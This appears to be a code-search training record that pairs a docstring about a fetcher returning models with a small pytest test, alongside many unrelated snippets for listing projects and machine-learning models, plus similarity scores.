# Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n 
query_string={\"difficulty\": \"MODERATE\"},\n )\n # User is only permitted to map test_project_1 and test_project_2, since test_project_3 is DRAFT.\n # So we should get only test_project_1 as it is the only project with difficulty set to MODERATE.\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def project_list(ctx, parent_project_id, output_format, columns):\n data = ctx.obj.get_projects(parent_project_id=parent_project_id)\n if output_format == 'table':\n column_names = columns.split(',')\n output_table(column_names, data['project'])\n elif output_format == 'json':\n output_json_data(data)", "def select_approved_projects(self):\r\n print \"Selecting approved projects... \"\r\n global ANNUAL_BUDGET\r\n \r\n projects_citizens_sorted = sorted(self.projects_for_vote, key=lambda project:project.units, reverse=True)\r\n projects_reps_sorted = sorted(self.projects_for_vote, key=lambda project:project.p_units, reverse=True)\r\n budget_sum = 0\r\n \r\n for p in projects_citizens_sorted:\r\n budget_sum += p.budget\r\n if budget_sum <= ANNUAL_BUDGET/2:\r\n self.projects_approved.append(p)\r\n\r\n budget_sum = 0\r\n for p in projects_reps_sorted:\r\n if p not in self.projects_approved:\r\n budget_sum += p.budget\r\n if budget_sum <= ANNUAL_BUDGET/2:\r\n self.projects_approved.append(p)\r\n\r\n\r\n \r\n# raw_input(\"select_approved_projects - antes\")\r\n for p in projects_citizens_sorted:\r\n print p\r\n print \"\\nReps\\n\"\r\n for p in projects_reps_sorted:\r\n print p\r\n print \"\\nApproved\\n\"\r\n for p in self.projects_approved:\r\n print p\r\n\r\n raw_input(\"select_approved_projects - depois\")", "def projects(request):\n projects = (\n Project.objects.visible()\n .visible_for(request.user)\n .prefetch_related(\"latest_translation__user\")\n .order_by(\"name\")\n )\n\n if not projects:\n return render(request, \"no_projects.html\", {\"title\": \"Projects\"})\n\n return render(\n request,\n \"projects/projects.html\",\n {\"projects\": projects, \"top_instances\": projects.get_top_instances()},\n )", "def getAcceptedProjectsForOrg(org, limit=1000):\n q = getAcceptedProjectsQuery(org=org)\n return q.fetch(limit)", "def test_handle_list_no_teams(self):\r\n self.mock_facade.query.return_value = []\r\n self.assertTupleEqual(self.testcommand.handle(\"project list\", user),\r\n (\"No Projects Exist!\", 200))", "def get_projects():\n if current_user.get_id() is None:\n return\n with database.engine.begin() as connection:\n result = connection.execute(select(\n [models.projects.c.project_id, models.projects.c.name, models.projects.c.path, models.projects.c.creation_date, models.projects.c.user_id, func.count(models.objects.c.object_id).label('object_count')])\n .select_from(models.projects.outerjoin(models.objects))\n .where(and_(models.projects.c.active == True, models.projects.c.user_id == current_user.id))\n .group_by(models.projects.c.project_id)\n .order_by(models.projects.c.project_id))\n projects = [dict(row) for row in result]\n for project in projects:\n user = models.User.query.filter_by(\n id=project['user_id']).first()\n if user:\n project['email'] = user.email\n return projects", "def test_find_all(self):\n result = Project.objects.find(['test'], project_type=None)\n self.assertEqual(len(result), 2)\n result = Project.objects.find(['ThisFails'], project_type=None)\n self.assertEqual(len(result), 0)", "def 
_get_projects_from_userinfo(\n userinfo: typing.Dict[str, typing.Any],\n) -> typing.List[typing.Any] | None:\n if \"sdConnectProjects\" in userinfo:\n # Remove the possibly existing \"project_\" prefix\n projects = [\n p.removeprefix(\"project_\") for p in userinfo[\"sdConnectProjects\"].split(\" \")\n ]\n # we add this check in case the claim `sdConnectProjects does not exist`\n # and we want to enforce this at deployment\n elif setd[\"sdconnect_enabled\"] and \"sdConnectProjects\" not in userinfo:\n projects = []\n else:\n return None\n\n if len(projects) == 0:\n # No project group information received, aborting\n raise aiohttp.web.HTTPUnauthorized(reason=\"User is not a member of any project.\")\n\n return projects" ]
[ "0.8058686", "0.71893626", "0.70169073", "0.6866926", "0.6799763", "0.67065436", "0.66316026", "0.66316026", "0.6614815", "0.66046983", "0.65524906", "0.6446057", "0.64291626", "0.6345218", "0.63182366", "0.6217229", "0.6167629", "0.616253", "0.6144264", "0.612364", "0.6112479", "0.60485303", "0.6020033", "0.601014", "0.59872246", "0.59809744", "0.5969042", "0.59349597", "0.5930217", "0.5920709", "0.59140867", "0.59095335", "0.5906449", "0.58782214", "0.58736634", "0.584501", "0.5840118", "0.57996106", "0.57925254", "0.5760198", "0.575688", "0.57550955", "0.5754842", "0.57421345", "0.56866086", "0.56713486", "0.5662185", "0.5654776", "0.5647357", "0.5626675", "0.5622164", "0.56203324", "0.56203324", "0.5595656", "0.5590346", "0.5584246", "0.5570996", "0.55661833", "0.55575335", "0.55514795", "0.5549315", "0.55475223", "0.5535418", "0.5519913", "0.5511356", "0.5510358", "0.5505992", "0.5504367", "0.5501809", "0.54915065", "0.5487568", "0.54694885", "0.54669344", "0.5456739", "0.5453173", "0.544977", "0.54404896", "0.5439633", "0.5438768", "0.54375714", "0.54373366", "0.543077", "0.5411306", "0.53970873", "0.5387781", "0.5387754", "0.5376129", "0.5366216", "0.5339491", "0.533637", "0.533363", "0.53335464", "0.53268915", "0.53200483", "0.53125066", "0.5311114", "0.53049225", "0.5299056", "0.52960384", "0.52904713" ]
0.59895086
24
fetcher.get_models() should return a list of models.
def test_get_models_returns_models(fc: fetcher.Fetcher):
    ml = fc.get_models()
    assert isinstance(ml, list)
    assert isinstance(ml[0], models.LookmlModel)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def models() -> list[str]:\n return list(models_url.keys())", "def get_models(self):\n self.load()\n return self._models", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "async def list_models(\n list_models_request: ListModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/list_models endpoint\")\n logging.debug(f\"Request: {list_models_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().list_model_controller(\n request=list_models_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n 
detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/list_models endpoint: {error}\")\n raise error", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in 
os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def get_all_models() -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT manufacturer, description, modelnumber, weight\n FROM Model\"\"\"\n cur.execute(sql, ())\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n models = []\n for row in result:\n models.append(\n [row[0], row[1], row[2], row[3]]\n )\n\n cur.close()\n conn.close()\n return models\n except Exception as e:\n print(\"fff\")\n print(e)\n # If login failed, return None\n cur.close()\n conn.close()\n return []", "def generate_model_list():\n\t\n\tmodels = [\n\t\tapi.v1.models.job.Job,\n\t]\n\treturn models", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] 
= status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def models(self):\n return self.config.models()", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def iter_models(self):\n return iter(self.model_list)", "def list_models():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_models\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def models(self) -> list[AbstractModel]:\n return self._models", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. 
otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "def test_coupledmodels_get(self):\n pass", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def models(self):\n models = []\n for bundle in self.bundles.values():\n models.extend(list(bundle.models.values()))\n\n return models", "def models(self, protocol=None, groups=None):\n return self.clients(protocol, groups)", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def load_models(appname):\n return import_module('.models', appname)", "def models(self) -> t.List[Model]:\n _models: t.List[Model] = [\n item for item in self._deployables if isinstance(item, Model)\n ]\n return _models", "def peak_all_models(self) -> List:\n models = list(self.meta.name)\n print(models)\n return models", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def availablemodels(self):\n return self.__models.keys()", "def get(self, request):\n MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n 
\"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def _pc_load_models(model_name = None, mod_list = None, n_sample = None, verbose = False, **kwargs):\n\n if model_name is not None:\n mod_list = glob.glob(model_name + '*.out')\n if mod_list is None or mod_list == []:\n pc.log_.error('No model found', calling='load models')\n return None\n if n_sample is not None:\n if n_sample > len(mod_list):\n pc.log_.error('less models {0:d} than n_sample {1:d}'.format(len(mod_list), n_sample),\n calling='load models')\n return None\n mod_list = random.sample(mod_list, n_sample)\n m = []\n for outfile in mod_list:\n if outfile[-4::] == '.out':\n model_name = outfile[0:-4]\n else:\n model_name = outfile\n try:\n cm = pc.CloudyModel(model_name, verbose=0, **kwargs)\n if not cm.aborted:\n m.append(cm)\n if verbose:\n print('{0} model read'.format(outfile[0:-4]))\n except:\n pass\n pc.log_.message('{0} models read'.format(len(m)), calling='load_models')\n return m", "def handle_models_request():\n # TODO: add sort and filter by creation/modification date\n return (\n json.dumps({\"models\": {\n k: d[\"data\"] for k, d in app.models.items()\n }}), 200,\n {'ContentType': 'application/json'}\n )", "def list_dashdb_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='DashDB In-database Model', fields=fields)\n\t\treturn models", "def list_models(self, sort: bool = True, limit: int | None = None) -> Iterator[ExecutableModelSpace]:\n return self._strategy.list_models(sort=sort, limit=limit)", "def get_object_models(self):\n parser = WorldParser(self.world_fpath)\n return parser.models", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def models_list(request):\n projects = Project.objects.filter(models=1)\n return render(request, 'screenshower/app/models_list.html', {'projects': projects})", "def get_available_entities_models():\n return ['concat', 'bahdanau', 'luong']", "def test_get_hyperflex_server_model_list(self):\n pass", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n 
list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models", "def build_models():\n train_models()\n return build_response.sent_ok()", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert 
isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _get_models_from_metafile(dir: str):\n meta_indexes = load(osp.join(dir, 'model-index.yml'))\n for meta_path in meta_indexes['Import']:\n # meta_path example: mmcls/.mim/configs/conformer/metafile.yml\n meta_path = osp.join(dir, meta_path)\n metainfo = load(meta_path)\n yield from metainfo['Models']", "def load_models(model_base_name=None, num_voices=4):\n models = []\n for voice_index in range(num_voices):\n model_path_name = os.path.join(PACKAGE_DIR,\n 'models/' + model_base_name+ '_' + str(\n voice_index))\n model = load_model(model_path_name)\n model.compile(optimizer='adam',\n loss={'pitch_prediction': 'categorical_crossentropy'\n },\n metrics=['accuracy'])\n models.append(model)\n return models", "def search_models(\n domain: str,\n sub_domain: str,\n architecture: Union[str, None] = None,\n sub_architecture: Union[str, None] = None,\n framework: Union[str, None] = None,\n repo: Union[str, None] = None,\n dataset: Union[str, None] = None,\n training_scheme: Union[str, None] = None,\n sparse_name: Union[str, None] = None,\n sparse_category: Union[str, None] = None,\n sparse_target: Union[str, None] = None,\n release_version: Union[str, None] = None,\n page: int = 1,\n page_length: int = 20,\n override_folder_name: Union[str, None] = None,\n override_parent_path: Union[str, None] = None,\n force_token_refresh: bool = False,\n ) -> List[Model]:\n return Model.search_models(\n domain=domain,\n sub_domain=sub_domain,\n architecture=architecture,\n sub_architecture=sub_architecture,\n framework=framework,\n repo=repo,\n dataset=dataset,\n training_scheme=training_scheme,\n sparse_name=sparse_name,\n sparse_category=sparse_category,\n sparse_target=sparse_target,\n release_version=release_version,\n page=page,\n page_length=page_length,\n override_folder_name=override_folder_name,\n override_parent_path=override_parent_path,\n force_token_refresh=force_token_refresh,\n )", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def models():\n return list(alg2module.keys())", "async def list(request):\n dict_answer = {'models': [item[1]+' '+item[0]+str(item[2:]) for item in models_db],\n 'datasets': [conv_time(d.stat().st_atime)+' '+str(d.name) for d in Path('data/datasets/').glob('*')],\n }\n return web.json_response(dict_answer)", "def get_models(automaker, year):\n return set([row[\"model\"] for row in data\n if row[\"automaker\"] == automaker and\n row[\"year\"] == year])", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def models(self):\n return self._base.classes", "def find_models(page_index=0):\n search_query = {\n 
